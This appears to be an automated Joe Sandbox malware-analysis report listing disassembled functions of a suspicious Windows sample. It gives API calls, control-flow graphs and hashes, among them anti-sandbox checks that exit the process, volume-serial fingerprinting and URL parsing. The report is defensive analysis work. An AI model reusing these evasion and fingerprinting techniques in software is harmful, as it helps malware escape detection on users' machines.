                          • Instruction Fuzzy Hash: CBA23270A012059FCB20DF65D948A9BB7F5AF44314F18847AE809EB3A1DB79DC86CF94
                          Function 0041FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420013
                          • lstrlen.KERNEL32(0042CFEC), ref: 004200BD
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004200E1
                          • lstrlen.KERNEL32(0042CFEC), ref: 004200EC
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420110
                          • lstrlen.KERNEL32(0042CFEC), ref: 0042011B
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042013F
                          • lstrlen.KERNEL32(0042CFEC), ref: 0042015A
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420189
                          • lstrlen.KERNEL32(0042CFEC), ref: 00420194
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004201C3
                          • lstrlen.KERNEL32(0042CFEC), ref: 004201CE
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420206
                          • lstrlen.KERNEL32(0042CFEC), ref: 00420250
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0042059B
                          • lstrlen.KERNEL32(00FA6340), ref: 004205AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 004205D7
                          • lstrcat.KERNEL32(00000000,?), ref: 004205E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042060E
                          • lstrlen.KERNEL32(00FBDAF8), ref: 00420625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0042064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00420658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00420681
                          • lstrlen.KERNEL32(00FA6280), ref: 00420698
                          • lstrcpy.KERNEL32(00000000,?), ref: 004206C9
                          • lstrcat.KERNEL32(00000000,?), ref: 004206D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00420706
                          • lstrcpy.KERNEL32(00000000,00FB8930), ref: 0042074B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0042077F
                          • lstrcpy.KERNEL32(00000000,00FBDA38), ref: 004207E7
                          • lstrcpy.KERNEL32(00000000,00FB8A10), ref: 00420858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 004208CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00420928
                          • lstrcpy.KERNEL32(00000000,00FB8B30), ref: 004209F8
                            • Part of subcall function 004024E0: lstrcpy.KERNEL32(00000000,?), ref: 00402528
                            • Part of subcall function 004024E0: lstrcpy.KERNEL32(00000000,?), ref: 0040254E
                            • Part of subcall function 004024E0: lstrcpy.KERNEL32(00000000,?), ref: 00402577
                          • lstrcpy.KERNEL32(00000000,00FB8AB0), ref: 00420ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00420B81
                          • lstrcpy.KERNEL32(00000000,00FB8AB0), ref: 00420D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: 102da0547f015c8a6b6665157c5076d66cc89a4e5b28524f58839b2f620943f4
                          • Instruction ID: 2977f58bd565bc87d3027e3a4284b5b6abf89f5725de4680fc1820e78b50a913
                          • Opcode Fuzzy Hash: 102da0547f015c8a6b6665157c5076d66cc89a4e5b28524f58839b2f620943f4
                          • Instruction Fuzzy Hash: 5EE27C70A053418FD724DF29D588B6AB7E1BF88304F98846EE44D8B3A2DB79D841CF56
                          Function 0041F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00FA6640), ref: 0041F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F47B
                          • lstrcpy.KERNEL32(00000000,00FA6640), ref: 0041F4BB
                          • lstrcpy.KERNEL32(00000000,00FB8910), ref: 0041F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F718
                          • lstrlen.KERNEL32(00FB8820), ref: 0041F746
                          • lstrcpy.KERNEL32(00000000,00FB8820), ref: 0041F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FA32
                          • lstrlen.KERNEL32(00FB8990), ref: 0041FA60
                          • lstrcpy.KERNEL32(00000000,00FB8990), ref: 0041FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 806779118f500e9edd6336fbe00a6e27762bcd0c698c7585eff1c0e9e23367b8
                          • Instruction ID: b1b3401ca7ed6073f6a1df52858564e1fd518ad7e6c307e5b2d44b517578f4c8
                          • Opcode Fuzzy Hash: 806779118f500e9edd6336fbe00a6e27762bcd0c698c7585eff1c0e9e23367b8
                          • Instruction Fuzzy Hash: 96F12D70A01202CFCB24DF69D948A96B7E5BF44314B18817ED8099B3A1D779DC87CF98
                          Function 00418CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2721 418ca0-418cc4 StrCmpCA 2722 418cc6-418cc7 ExitProcess 2721->2722 2723 418ccd-418ce6 2721->2723 2725 418ee2-418eef call 402a20 2723->2725 2726 418cec-418cf1 2723->2726 2727 418cf6-418cf9 2726->2727 2729 418ec3-418edc 2727->2729 2730 418cff 2727->2730 2729->2725 2768 418cf3 2729->2768 2732 418d84-418d92 StrCmpCA 2730->2732 2733 418da4-418db8 StrCmpCA 2730->2733 2734 418d06-418d15 lstrlen 2730->2734 2735 418e88-418e9a lstrlen 2730->2735 2736 418e6f-418e7d StrCmpCA 2730->2736 2737 418d30-418d3f lstrlen 2730->2737 2738 418e56-418e64 StrCmpCA 2730->2738 2739 418d5a-418d69 lstrlen 2730->2739 2740 418dbd-418dcb StrCmpCA 2730->2740 2741 418ddd-418deb StrCmpCA 2730->2741 2742 418dfd-418e0b StrCmpCA 2730->2742 2743 418e1d-418e2b StrCmpCA 2730->2743 2744 418e3d-418e4b StrCmpCA 2730->2744 2732->2729 2752 418d98-418d9f 2732->2752 2733->2729 2757 418d17-418d1c call 402a20 2734->2757 2758 418d1f-418d2b call 402930 2734->2758 2745 418ea4-418eb0 call 402930 2735->2745 2746 418e9c-418ea1 call 402a20 2735->2746 2736->2729 2761 418e7f-418e86 2736->2761 2747 418d41-418d46 call 402a20 2737->2747 2748 418d49-418d55 call 402930 2737->2748 2738->2729 2760 418e66-418e6d 2738->2760 2749 418d73-418d7f call 402930 2739->2749 2750 418d6b-418d70 call 402a20 2739->2750 2740->2729 2753 418dd1-418dd8 2740->2753 2741->2729 2754 418df1-418df8 2741->2754 2742->2729 2755 418e11-418e18 2742->2755 2743->2729 2756 418e31-418e38 2743->2756 2744->2729 2759 418e4d-418e54 2744->2759 2779 418eb3-418eb5 2745->2779 2746->2745 2747->2748 2748->2779 2749->2779 2750->2749 2752->2729 2753->2729 2754->2729 2755->2729 2756->2729 2757->2758 2758->2779 2759->2729 2760->2729 2761->2729 2768->2727 2779->2729 2780 418eb7-418eb9 2779->2780 2780->2729 2781 418ebb-418ebd lstrcpy 2780->2781 2781->2729
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 8983f2499ebbe81503e459e2129ac65020d433edc8972eb3e38289e769c8f2d0
                          • Instruction ID: e7fcc4a53534b60d15b00afbaab1e27a1efdad2741b636824d2c92ff7b56b57b
                          • Opcode Fuzzy Hash: 8983f2499ebbe81503e459e2129ac65020d433edc8972eb3e38289e769c8f2d0
                          • Instruction Fuzzy Hash: 2A518E70A047019FCB209F75DD88AAF7BF4BB54705B10682FE442D6650DBBCE9828F69
                          Function 00422740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2782 422740-422783 GetWindowsDirectoryA 2783 422785 2782->2783 2784 42278c-4227ea GetVolumeInformationA 2782->2784 2783->2784 2785 4227ec-4227f2 2784->2785 2786 4227f4-422807 2785->2786 2787 422809-422820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 422822-422824 2787->2788 2789 422826-422844 wsprintfA 2787->2789 2790 42285b-422872 call 4271e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0042277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004193B6,00000000,00000000,00000000,00000000), ref: 004227AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0042280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422816
                          • wsprintfA.USER32 ref: 0042283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: ce0125ce13eb0816da93c0b4716b1f90aac9f737335d5e264dd372cef419b960
                          • Instruction ID: d93c7da38ddd29de155311ca5e1d1e4f781f7aaabd56b552648b56c95dd02ec1
                          • Opcode Fuzzy Hash: ce0125ce13eb0816da93c0b4716b1f90aac9f737335d5e264dd372cef419b960
                          • Instruction Fuzzy Hash: 4E3170B1908219AFCB04DFA89A859EFBFB8EF58740F10016EE505E7250E6748B408BA5
                          Function 00404BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 404bc0-404bce 2794 404bd0-404bd5 2793->2794 2794->2794 2795 404bd7-404c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 402a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00404BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00404C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00404C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                          • Instruction ID: 1bd60353331dbecd9a7383d9733d23d0053dd466cc4828cfdfd0774d9622719e
                          • Opcode Fuzzy Hash: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                          • Instruction Fuzzy Hash: D8012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390EB7459058FD4
                          Function 00401030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 401030-401055 GetCurrentProcess VirtualAllocExNuma 2799 401057-401058 ExitProcess 2798->2799 2800 40105e-40107b VirtualAlloc 2798->2800 2801 401082-401088 2800->2801 2802 40107d-401080 2800->2802 2803 4010b1-4010b6 2801->2803 2804 40108a-4010ab VirtualFree 2801->2804 2802->2801 2804->2803
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0040104D
                          • ExitProcess.KERNEL32 ref: 00401058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0040106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004010AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                          • Instruction ID: aa33e4c314b55322e5f005f032d3d73aad5dab283e8b13059c6bb542b9569755
                          • Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                          • Instruction Fuzzy Hash: 5E0144713403047BE7240A656C1AF6B77AEA781B01F209029F744F33D0DAB1EA008AB8
                          Function 0041EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 41ee90-41eeb5 call 402930 2808 41eeb7-41eebf 2805->2808 2809 41eec9-41eecd call 406c40 2805->2809 2808->2809 2810 41eec1-41eec3 lstrcpy 2808->2810 2812 41eed2-41eee8 StrCmpCA 2809->2812 2810->2809 2813 41ef11-41ef18 call 402a20 2812->2813 2814 41eeea-41ef02 call 402a20 call 402930 2812->2814 2820 41ef20-41ef28 2813->2820 2823 41ef45-41efa0 call 402a20 * 10 2814->2823 2824 41ef04-41ef0c 2814->2824 2820->2820 2822 41ef2a-41ef37 call 402930 2820->2822 2822->2823 2831 41ef39 2822->2831 2824->2823 2827 41ef0e-41ef0f 2824->2827 2830 41ef3e-41ef3f lstrcpy 2827->2830 2830->2823 2831->2830
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: ce871ecde8db7cfc3056d6aeb74e55e33849ac66478390f3a1a41166bfceedc7
                          • Instruction ID: c28ac5a7a25757f932124dc7d3da9c4eb04f0c6587e56c0f8f9bd0407561c574
                          • Opcode Fuzzy Hash: ce871ecde8db7cfc3056d6aeb74e55e33849ac66478390f3a1a41166bfceedc7
                          • Instruction Fuzzy Hash: 662103747202065BCB21FF7ADD4969B37A4AF14304F04543EBC4AEB2D2DE78E8558B98
                          Function 004010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 4010c0-4010cb 2887 4010d0-4010dc 2886->2887 2889 4010de-4010f3 GlobalMemoryStatusEx 2887->2889 2890 401112-401114 ExitProcess 2889->2890 2891 4010f5-401106 2889->2891 2892 401108 2891->2892 2893 40111a-40111d 2891->2893 2892->2890 2894 40110a-401110 2892->2894 2894->2890 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
